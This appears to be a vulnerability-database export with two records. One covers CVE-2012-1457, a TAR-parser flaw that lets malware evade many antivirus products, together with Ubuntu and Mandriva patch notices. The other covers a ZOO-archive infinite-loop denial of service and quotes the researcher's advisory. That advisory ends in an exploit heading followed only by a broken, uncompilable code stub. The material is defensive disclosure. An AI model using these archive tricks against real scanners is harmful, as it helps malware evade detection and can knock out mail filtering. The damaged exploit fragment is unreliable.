            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2",
         },
         cvssV3: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/",
         },
         severity: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/cvss/severity#",
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
            "@id": "https://www.variotdbs.pl/ref/sources",
         },
      },
      data: [
         {
            cvssV2: [
               {
                  acInsufInfo: false,
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "NVD",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  obtainAllPrivilege: false,
                  obtainOtherPrivilege: false,
                  obtainUserPrivilege: false,
                  severity: "MEDIUM",
                  trust: 1,
                  userInteractionRequired: false,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  acInsufInfo: null,
                  accessComplexity: "Medium",
                  accessVector: "Network",
                  authentication: "None",
                  author: "NVD",
                  availabilityImpact: "None",
                  baseScore: 4.3,
                  confidentialityImpact: "None",
                  exploitabilityScore: null,
                  id: "CVE-2012-1457",
                  impactScore: null,
                  integrityImpact: "Partial",
                  obtainAllPrivilege: null,
                  obtainOtherPrivilege: null,
                  obtainUserPrivilege: null,
                  severity: "Medium",
                  trust: 0.8,
                  userInteractionRequired: null,
                  vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
                  version: "2.0",
               },
               {
                  accessComplexity: "MEDIUM",
                  accessVector: "NETWORK",
                  authentication: "NONE",
                  author: "VULHUB",
                  availabilityImpact: "NONE",
                  baseScore: 4.3,
                  confidentialityImpact: "NONE",
                  exploitabilityScore: 8.6,
                  id: "VHN-54738",
                  impactScore: 2.9,
                  integrityImpact: "PARTIAL",
                  severity: "MEDIUM",
                  trust: 0.1,
                  vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N",
                  version: "2.0",
               },
            ],
            cvssV3: [],
            severity: [
               {
                  author: "NVD",
                  id: "CVE-2012-1457",
                  trust: 1.8,
                  value: "MEDIUM",
               },
               {
                  author: "CNNVD",
                  id: "CNNVD-201203-420",
                  trust: 0.6,
                  value: "MEDIUM",
               },
               {
                  author: "VULHUB",
                  id: "VHN-54738",
                  trust: 0.1,
                  value: "MEDIUM",
               },
            ],
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   description: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/description#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Emsisoft Anti-Malware 5.1.0.1, eSafe 7.0.17.0, F-Prot Antivirus 4.6.2.117, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. The TAR file parsers in multiple products contain a vulnerability that can prevent malware detection. If it is announced that the problem also exists in different TAR parser implementations, this vulnerability may be split into multiple CVEs. A third party can bypass malware detection via a TAR archive entry with a length field that exceeds the total TAR file size. \nSuccessful exploits will allow attackers to bypass on-demand virus scanning, possibly allowing malicious files to escape detection. Vulnerabilities exist in the TAR file parser in Trend Micro AntiVirus version 9.120.0.1004, Trend Micro HouseCall version 9.120.0.1004, VBA32 version 3.12.14.2, and VirusBuster version 13.6.151.0. 
============================================================================\nUbuntu Security Notice USN-1482-1\nJune 19, 2012\n\nclamav vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 12.04 LTS\n- Ubuntu 11.10\n- Ubuntu 11.04\n- Ubuntu 10.04 LTS\n\nSummary:\n\nClamAV could improperly detect malware if it opened a specially crafted\nfile. \n\nSoftware Description:\n- clamav: Anti-virus utility for Unix\n\nDetails:\n\nIt was discovered that ClamAV incorrectly handled certain malformed TAR\narchives. (CVE-2012-1457,\nCVE-2012-1459)\n\nIt was discovered that ClamAV incorrectly handled certain malformed CHM\nfiles. (CVE-2012-1458)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 12.04 LTS:\n  clamav                          0.97.5+dfsg-1ubuntu0.12.04.1\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.12.04.1\n  libclamav6                      0.97.5+dfsg-1ubuntu0.12.04.1\n\nUbuntu 11.10:\n  clamav                          0.97.5+dfsg-1ubuntu0.11.10.1\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.11.10.1\n  libclamav6                      0.97.5+dfsg-1ubuntu0.11.10.1\n\nUbuntu 11.04:\n  clamav                          0.97.5+dfsg-1ubuntu0.11.04.1\n  clamav-daemon                   0.97.5+dfsg-1ubuntu0.11.04.1\n  libclamav6                      0.97.5+dfsg-1ubuntu0.11.04.1\n\nUbuntu 10.04 LTS:\n  clamav                          0.96.5+dfsg-1ubuntu1.10.04.4\n  clamav-daemon                   0.96.5+dfsg-1ubuntu1.10.04.4\n  libclamav6                      0.96.5+dfsg-1ubuntu1.10.04.4\n\nIn general, a standard system update will make all the necessary changes. 
\n\nReferences:\n  http://www.ubuntu.com/usn/usn-1482-1\n  CVE-2012-1457, CVE-2012-1458, CVE-2012-1459\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1\n  https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1\n  https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4\n. \n \n The Microsoft CHM file parser in ClamAV 0.96.4 allows remote attackers\n to bypass malware detection via a crafted reset interval in the LZXC\n header of a CHM file. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1457\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1458\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1459\n http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=ChangeLog;hb=clamav-0.97.5\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Enterprise Server 5:\n d82d78601290e2f6073974170c81841a  mes5/i586/clamav-0.97.5-0.1mdvmes5.2.i586.rpm\n 80f0475472c0217afd3727019bf27e53  mes5/i586/clamav-db-0.97.5-0.1mdvmes5.2.i586.rpm\n c13835eadea8d2af15b628fba3159e8b  mes5/i586/clamav-milter-0.97.5-0.1mdvmes5.2.i586.rpm\n d7c058fae32f1a081b1d4ca31157df0e  mes5/i586/clamd-0.97.5-0.1mdvmes5.2.i586.rpm\n 5ad153709c7eb510c2be2e82bfa5ac52  mes5/i586/libclamav6-0.97.5-0.1mdvmes5.2.i586.rpm\n 96e3d3f3e9bea802c4109c155c9d1465  mes5/i586/libclamav-devel-0.97.5-0.1mdvmes5.2.i586.rpm \n 203cde43731b63729d1f7f6497033184  mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n\n Mandriva Enterprise Server 5/X86_64:\n b30f5aafd9aaff0a7743fb62f33ccbea  mes5/x86_64/clamav-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 1508801239427c0ac72734f52cb4451c  mes5/x86_64/clamav-db-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 92b4c5ca6db656801b5b6ae217c6e171  
mes5/x86_64/clamav-milter-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 94fad12df2cc900309087bbda13c826a  mes5/x86_64/clamd-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 8ec166a457d0512479adaaf5f80d487f  mes5/x86_64/lib64clamav6-0.97.5-0.1mdvmes5.2.x86_64.rpm\n 19bc2758175bcde28ebf7783d68a9b98  mes5/x86_64/lib64clamav-devel-0.97.5-0.1mdvmes5.2.x86_64.rpm \n 203cde43731b63729d1f7f6497033184  mes5/SRPMS/clamav-0.97.5-0.1mdvmes5.2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi.  The verification\n of md5 checksums and GPG signatures is performed automatically for you. \n\n All packages are signed by Mandriva for security.  You can obtain the\n GPG public key of the Mandriva Security Team by executing:\n\n  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\n\n You can view other update advisories for Mandriva Linux at:\n\n  http://www.mandriva.com/security/advisories\n\n If you want to report vulnerabilities, please contact\n\n  security_(at)_mandriva.com\n _______________________________________________________________________\n\n Type Bits/KeyID     Date       User ID\n pub  1024D/22458A98 2000-07-10 Mandriva Security Team\n  <security*mandriva.com>\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.4.11 (GNU/Linux)\n\niD8DBQFP3tnKmqjQ0CJFipgRAj4wAJ9eURS1mZYCZhkmUTVE/U8QAH47MwCgxQzf\nOUr1QL5Wsvt3KboLKCdYUhE=\n=1QL7\n-----END PGP SIGNATURE-----\n",
      sources: [
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
      ],
      trust: 2.16,
   },
   exploit_availability: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            reference: "https://www.scap.org.cn/vuln/vhn-54738",
            trust: 0.1,
            type: "unknown",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
      ],
   },
   external_ids: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            db: "NVD",
            id: "CVE-2012-1457",
            trust: 3,
         },
         {
            db: "BID",
            id: "52610",
            trust: 1.4,
         },
         {
            db: "OSVDB",
            id: "80392",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80406",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80391",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80407",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80396",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80395",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80403",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80409",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80389",
            trust: 1.1,
         },
         {
            db: "OSVDB",
            id: "80393",
            trust: 1.1,
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
            trust: 0.8,
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
            trust: 0.7,
         },
         {
            db: "BUGTRAQ",
            id: "20120319 EVASION ATTACKS EXPOLITING FILE-PARSING VULNERABILITIES IN ANTIVIRUS PRODUCTS",
            trust: 0.6,
         },
         {
            db: "NSFOCUS",
            id: "19229",
            trust: 0.6,
         },
         {
            db: "PACKETSTORM",
            id: "113841",
            trust: 0.2,
         },
         {
            db: "VULHUB",
            id: "VHN-54738",
            trust: 0.1,
         },
         {
            db: "PACKETSTORM",
            id: "113878",
            trust: 0.1,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   id: "VAR-201203-0381",
   iot: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/iot#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: true,
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
      ],
      trust: 0.01,
   },
   last_update_date: "2023-12-18T12:10:12.001000Z",
   patch: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/patch#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.aladdin.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.antiy.net/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.authentium.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "https://www.avast.com/index",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.avg.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.avira.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.rising-global.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.bitdefender.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.clamav.net/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.emsisoft.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.eset.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.f-prot.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.gdata-software.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.ikarus.at/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://global.jiangmin.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.k7computing.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.mcafee.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.microsoft.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.norman.com/",
         },
         {
            title: "openSUSE-SU-2012:0833",
            trust: 0.8,
            url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.pctools.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.quickheal.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.symantec.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.trendmicro.com/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://anti-virus.by/en/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.virusbuster.hu/en/",
         },
         {
            title: "Top Page",
            trust: 0.8,
            url: "http://www.kaspersky.com/",
         },
      ],
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
      ],
   },
   problemtype_data: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            problemtype: "CWE-264",
            trust: 1.9,
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
      ],
   },
   references: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/references#",
         data: {
            "@container": "@list",
         },
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: [
         {
            trust: 1.7,
            url: "http://www.securityfocus.com/archive/1/522005",
         },
         {
            trust: 1.7,
            url: "http://www.ieee-security.org/tc/sp2012/program.html",
         },
         {
            trust: 1.1,
            url: "http://www.securityfocus.com/bid/52610",
         },
         {
            trust: 1.1,
            url: "http://www.mandriva.com/security/advisories?name=mdvsa-2012:094",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80389",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80391",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80392",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80393",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80395",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80396",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80403",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80406",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80407",
         },
         {
            trust: 1.1,
            url: "http://osvdb.org/80409",
         },
         {
            trust: 1.1,
            url: "http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html",
         },
         {
            trust: 1.1,
            url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/74293",
         },
         {
            trust: 0.9,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1457",
         },
         {
            trust: 0.8,
            url: "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-1457",
         },
         {
            trust: 0.6,
            url: "http://www.nsfocus.net/vulndb/19229",
         },
         {
            trust: 0.3,
            url: "http://www.antiy.net",
         },
         {
            trust: 0.3,
            url: "http://www.authentium.com",
         },
         {
            trust: 0.3,
            url: "http://www.avast.com",
         },
         {
            trust: 0.3,
            url: "http://www.avg.com",
         },
         {
            trust: 0.3,
            url: "http://www.avira.com/",
         },
         {
            trust: 0.3,
            url: "http://www.bitdefender.com",
         },
         {
            trust: 0.3,
            url: "http://www.emsisoft.com/en/software/antimalware/",
         },
         {
            trust: 0.3,
            url: "http://www.safenet-inc.com/data-protection/content-security-esafe/",
         },
         {
            trust: 0.3,
            url: "http://eset.com",
         },
         {
            trust: 0.3,
            url: "http://www.f-prot.com/",
         },
         {
            trust: 0.3,
            url: "http://www.gdatasoftware.com",
         },
         {
            trust: 0.3,
            url: "http://www.ikarus.at",
         },
         {
            trust: 0.3,
            url: "http://global.jiangmin.com/",
         },
         {
            trust: 0.3,
            url: "http://www.k7computing.com/en/product/k7-antivirusplus.php",
         },
         {
            trust: 0.3,
            url: "http://www.kaspersky.com/",
         },
         {
            trust: 0.3,
            url: "http://www.mcafee.com/",
         },
         {
            trust: 0.3,
            url: "http://www.microsoft.com",
         },
         {
            trust: 0.3,
            url: "http://anti-virus-software-review.toptenreviews.com/norman-review.html",
         },
         {
            trust: 0.3,
            url: "http://www.pctools.com/spyware-doctor-antivirus/",
         },
         {
            trust: 0.3,
            url: "http://www.quickheal.com/",
         },
         {
            trust: 0.3,
            url: "http://www.rising-global.com/",
         },
         {
            trust: 0.3,
            url: "http://www.symantec.com",
         },
         {
            trust: 0.3,
            url: "http://www.trend.com",
         },
         {
            trust: 0.3,
            url: "http://anti-virus.by/en/index.shtml",
         },
         {
            trust: 0.3,
            url: "/archive/1/522005",
         },
         {
            trust: 0.2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1457",
         },
         {
            trust: 0.2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1459",
         },
         {
            trust: 0.2,
            url: "https://nvd.nist.gov/vuln/detail/cve-2012-1458",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.96.5+dfsg-1ubuntu1.10.04.4",
         },
         {
            trust: 0.1,
            url: "http://www.ubuntu.com/usn/usn-1482-1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.10.1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.12.04.1",
         },
         {
            trust: 0.1,
            url: "https://launchpad.net/ubuntu/+source/clamav/0.97.5+dfsg-1ubuntu0.11.04.1",
         },
         {
            trust: 0.1,
            url: "http://www.mandriva.com/security/",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1459",
         },
         {
            trust: 0.1,
            url: "http://www.mandriva.com/security/advisories",
         },
         {
            trust: 0.1,
            url: "http://git.clamav.net/gitweb?p=clamav-devel.git;a=blob_plain;f=changelog;hb=clamav-0.97.5",
         },
         {
            trust: 0.1,
            url: "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-1458",
         },
      ],
      sources: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   sources: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            db: "BID",
            id: "52610",
         },
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   sources_release_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2012-03-21T00:00:00",
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            date: "2012-03-20T00:00:00",
            db: "BID",
            id: "52610",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            date: "2012-06-20T02:54:11",
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            date: "2012-06-19T00:56:02",
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            date: "2012-03-21T10:11:49.287000",
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            date: "2012-03-26T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   sources_update_date: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
         data: {
            "@container": "@list",
         },
      },
      data: [
         {
            date: "2018-01-18T00:00:00",
            db: "VULHUB",
            id: "VHN-54738",
         },
         {
            date: "2015-05-07T17:17:00",
            db: "BID",
            id: "52610",
         },
         {
            date: "2012-07-25T00:00:00",
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
         {
            date: "2018-01-18T02:29:13.083000",
            db: "NVD",
            id: "CVE-2012-1457",
         },
         {
            date: "2012-04-01T00:00:00",
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
   },
   threat_type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "remote",
      sources: [
         {
            db: "PACKETSTORM",
            id: "113878",
         },
         {
            db: "PACKETSTORM",
            id: "113841",
         },
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
      trust: 0.8,
   },
   title: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/title#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "Multiple products  TAR Vulnerability that prevents file parsers from detecting malware",
      sources: [
         {
            db: "JVNDB",
            id: "JVNDB-2012-001902",
         },
      ],
      trust: 0.8,
   },
   type: {
      "@context": {
         "@vocab": "https://www.variotdbs.pl/ref/type#",
         sources: {
            "@container": "@list",
            "@context": {
               "@vocab": "https://www.variotdbs.pl/ref/sources#",
            },
         },
      },
      data: "permissions and access control",
      sources: [
         {
            db: "CNNVD",
            id: "CNNVD-201203-420",
         },
      ],
      trust: 0.6,
   },
}

var-200705-0183
Vulnerability from variot

zoo decoder 2.10 (zoo-2.10), as used in multiple products including (1) Barracuda Spam Firewall 3.4 and later with virusdef before 2.0.6399, (2) Spam Firewall before 3.4 20070319 with virusdef before 2.0.6399o, and (3) AMaViS 2.4.1 and earlier, allows remote attackers to cause a denial of service (infinite loop) via a ZOO archive with a direntry structure that points to a previous file. It is used in (1) Barracuda Spam Firewall, (2) Spam Firewall, and (3) AMaViS, among others. The Zoo compression algorithm is prone to a remote denial-of-service vulnerability. This issue arises when applications implementing the Zoo algorithm process certain malformed archives. A successful attack can exhaust system resources and trigger a denial-of-service condition. This issue affects Zoo 2.10 and other applications implementing the vulnerable algorithm.


The vulnerability is caused due to an error in the handling of Zoo archives. This can be exploited to cause an infinite loop resulting in high CPU utilisation.

SOLUTION: Update to firmware version 3.4 and virus definition 2.0.6399 or later.

PROVIDED AND/OR DISCOVERED BY: Jean-Sebastien Guay-Leroux

ORIGINAL ADVISORY: Barracuda Networks: http://www.barracudanetworks.com/ns/resources/tech_alert.php

Jean-Sebastien Guay-Leroux: http://www.guay-leroux.com/projects/zoo-infinite-advisory.txt


Topic: Multiple vendors ZOO file decompression infinite loop DoS

Announced: 2007-05-04
Credits: Jean-Sebastien Guay-Leroux
Products: Multiple (see section III)
Impact: DoS (99% CPU utilisation)
CVE ID: CVE-2007-1669, CVE-2007-1670, CVE-2007-1671, CVE-2007-1672, CVE-2007-1673

I. BACKGROUND

Zoo is a compression program and format developed by Rahul Dhesi in the mid 1980s. The format is based on the LZW compression algorithm and compressed files are identified by the .zoo file extension.

II. DESCRIPTION

The vulnerability lies in the algorithm used to locate the files inside the archive. Each file in a ZOO archive is identified by a direntry structure. These structures are linked to one another by a 'next' pointer, which is in fact an offset from the beginning of the file to the next direntry structure. If that offset refers to an entry that has already been processed, the same file is processed more than once, and the ZOO parser enters an infinite loop.

III. AFFECTED SOFTWARE

o Barracuda Spam Firewall
o Panda Software Antivirus
o avast! antivirus
o Avira AntiVir
o zoo-2.10
o unzoo.c
o WinAce
o PicoZip

IV. IMPACT

If this attack is conducted against a vulnerable antivirus, the host system will have its CPU at 100% utilization and may have problems answering other requests.

If this attack is conducted against an SMTP content filter running a vulnerable ZOO implementation, legitimate clients may be unable to send and receive email through this server.

V. SOLUTION

o Barracuda Spam Firewall - CVE-2007-1669: They fixed this problem in virusdef 2.0.6399 for firmware >= 3.4 and 2.0.6399o for firmware < 3.4 March 19th 2007.

o Panda Software Antivirus - CVE-2007-1670: They fixed this problem April 2nd 2007.

o avast! antivirus - CVE-2007-1672: They fixed this problem in version 4.7.981, April 14th 2007.

o Avira AntiVir - CVE-2007-1671: They fixed this problem in avpack32.dll version 7.3.0.6 March 22nd 2007.

o zoo-2.10 - CVE-2007-1669: This software is not maintained anymore. A patch for version 2.10 is provided in section VII of this advisory because some SMTP content filters may still use this software.

o unzoo.c - CVE-2007-1673: This software is not maintained anymore. No patch is provided for this software.

o WinAce was contacted but no response was received from them.

o PicoZip was contacted but no response was received from them.

VI. PROOF OF CONCEPT

Using the PIRANA framework version 0.3.3, available at http://www.guay-leroux.com , it is possible to test your SMTP server against this vulnerability.

Alternatively, here is an exploit that will create a file that will trigger the infinite loop condition when it is processed.

/*

Exploit for the vulnerability: Multiple vendors ZOO file decompression infinite loop DoS

coded by Jean-Sébastien Guay-Leroux September 2006

*/

include

include

include

// Structure of a ZOO header
//
// Byte offsets into the archive image that main() assembles in memory. The
// ZH_* values are offsets from the start of the file (main() uses them as
// hdr + ZH_*); the D_* values are offsets from the start of a directory
// entry (main() uses them as hdr + ZOO_HEADER_SIZE + D_*).
// NOTE(review): this listing is extraction-damaged and is not compilable as shown.

// Size of the archive header; main() also uses it as the file offset of the
// first directory entry.
